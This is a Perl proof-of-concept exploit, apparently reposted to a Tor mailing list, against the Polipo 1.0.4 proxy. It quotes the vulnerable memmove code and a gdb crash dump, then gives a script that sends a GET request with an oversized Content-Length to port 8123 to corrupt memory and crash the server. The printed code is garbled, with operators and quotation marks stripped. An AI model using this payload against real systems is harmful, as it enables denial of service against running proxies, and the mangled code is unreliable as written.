#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
#
# Jeremy Brown [0xjbrow...@gmail.com//jbrownsec.blogspot.com//krakowlabs.com]
12.07.2009
#
#
*
#
# Hzzp loves you Polipo!
#
# No use reporting this issue to Ubuntu Security unless you feel like waiting
two weeks for them to sit on
# it, then UNFLAG security issue and call it a feature.
#
# I informally request that they apologize to the developers themselves x)
#
# polipo-20080907/client.c [1001-1009]:
#
# if(connection-reqlen connection-reqbegin) {
# memmove(connection-reqbuf, connection-reqbuf + connection-reqbegin,
# connection-reqlen - connection-reqbegin);
# connection-reqlen -= connection-reqbegin;
# connection-reqbegin = 0;
# } else {
# connection-reqlen = 0;
# connection-reqbegin = 0;
# }
#
# 0.9.8 / 1.0.4 tested vulnerable
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40093486 in memmove () from /lib/libc.so.6
# (gdb) i r
# eax0x8000 -2147483648
# ecx0x22
# edx0x802c -2147483604
# ebx0x80775d8 134706648
# esp0xb7f0 0xb7f0
# ebp0xb7f8 0xb7f8
# esi0x4017002d 1075249197
# edi0xc017002d -1072234451
# eip0x40093486 0x40093486
# eflags 0x1068667206
# cs 0x23 35
# ss 0x2b 43
# ds 0x2b 43
# es 0x2b 43
# fs 0x00
# gs 0x00
# (gdb) bt
#0 0x40093486 in memmove () from /lib/libc.so.6
#1 0x0805a594 in ?? ()
#2 0x4017 in ?? ()
#3 0xc017 in ?? ()
#4 0x802e in ?? ()
#5 0x0804e744 in ?? ()
#6 0x08077548 in ?? ()
#7 0x08077550 in ?? ()
#8 0x0001 in ?? ()
#9 0x000a in ?? ()
#10 0x0001 in ?? ()
#11 0x080775d8 in ?? ()
#12 0xb908 in ?? ()
#13 0x0805a458 in ?? ()
#14 0x08077498 in ?? ()
#15 0x0001 in ?? ()
#16 0x0001 in ?? ()
#17 0x0001 in ?? ()
#18 0x0001 in ?? ()
#19 0x0805eb8d in ?? ()
#20 0x in ?? ()
#21 0xb8d0 in ?? ()
#22 0xb8ac in ?? ()
#23 0xb8b0 in ?? ()
#24 0x in ?? ()
#25 0x in ?? ()
#26 0x in ?? ()
#27 0x in ?? ()
#28 0x in ?? ()
#29 0x in ?? ()
#30 0x in ?? ()
#31 0x in ?? ()
#32 0xb8b4 in ?? ()
#33 0xb8c0 in ?? ()
#34 0x in ?? ()
#35 0x in ?? ()
#36 0xb8b8 in ?? ()
#37 0xb8bc in ?? ()
#38 0x40170003 in ?? ()
#39 0x0806f803 in _IO_stdin_used ()
#40 0x08077550 in ?? ()
#41 0x4008dc91 in mallopt () from /lib/libc.so.6
# Previous frame inner to this frame (corrupt stack?)
# (gdb)
#
#(gdb) x/i $eip
#0x40093486 memmove+102: repz movsb %ds:(%esi),%es:(%edi)
#
# And my hair cannot commit, to one popular genre of music
#
#
*
# estranged.pl
use IO::Socket;
$target = $ARGV[0];
$port = 8123;
$payload = GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n;
$sock = IO::Socket::INET-new(Proto='tcp', PeerHost=$target, PeerPort=$port)
or die Error: $target:$port\n;
$sock-send($payload);
close($sock);
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talkin the body. http://archives.seul.org/or/talk/